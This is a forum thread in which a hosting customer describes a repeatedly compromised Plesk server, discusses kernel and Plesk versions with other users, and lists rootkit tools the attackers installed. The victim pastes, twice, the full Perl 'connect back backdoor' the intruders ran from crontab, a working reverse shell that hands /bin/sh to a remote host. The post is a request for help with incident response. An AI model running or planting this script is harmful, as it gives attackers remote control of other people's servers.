Server hacked - unable to log case at Support panel [SOLVED]
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
Can you find a kernel version in Plesk (e.g. something like "Operating system: Linux 2.6.9-78.0.5.EL")? Or can you run "uname -a" via SSH?
I don't know if Plesk 8.3 has any known security vulnerabilities, but Plesk 8.6 is the current version.
I don't know if Plesk 8.3 has any known security vulnerabilities, but Plesk 8.6 is the current version.
Lemonbit Internet Dedicated Server Management
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
The current 'super stable' RHEL4-based OpenVZ-kernel is 2.6.9-023stab048.4. I have no idea how old 2.6.9-023stab046.2 is. I believe uname -a also gives you a build date?biggles wrote:uname -a: 2.6.9-023stab046.2-enterprise
What debacle? We updated all our machines to 8.4 and then 8.6. No problems whatsoever.biggles wrote:OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...
Lemonbit Internet Dedicated Server Management
uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux
Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
Well, that is an older kernel. I don't know if it contains any known local root exploits though. I track security vulnerabilities in the packages we use closely, but we're not running Virtuozzo, so I don't know about those Virtuozzo/OpenVZ kernels.biggles wrote:uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux
Oh that. I never thought allowing the use of short mail account names was a smart idea, so this issue didn't affect us.biggles wrote:Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
Lemonbit Internet Dedicated Server Management
A small update. The attackers got in again last night (European time). This time I cought them in the act and had the possibility to secure logs etc. They had also installed some programs among others "zap", "zmuie", some flood-kit, Part of IlloGiC RooTKiT v1.0 etc etc. They seemed to be running some tainted crond version. The support have been granted access to my server. Hopefully they will find out how they got in.
Not much news. Scott had trouble logging in today. Hopefully he can do another attempt later. They broke into the server again today. They are executing this script via crontab:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
Anyone has any input on how to stop this I am all ears...
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
Anyone has any input on how to stop this I am all ears...
-
- Forum Regular
- Posts: 661
- Joined: Mon Oct 29, 2007 6:51 pm
We can deliver quality hosting form the Netherlands! You can mail me at info @ ber-art.nl our servers are being maintained by Lemonbit (alias breun)
Last edited by BerArt on Wed Nov 12, 2008 5:23 am, edited 1 time in total.
Yes, you can't go wrong with breun/Lemonbit.
I've "known" them for a very long time from these forums and you will never get bad advice from them. Same goes for BerArt!
Faris.
I've "known" them for a very long time from these forums and you will never get bad advice from them. Same goes for BerArt!
Faris.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>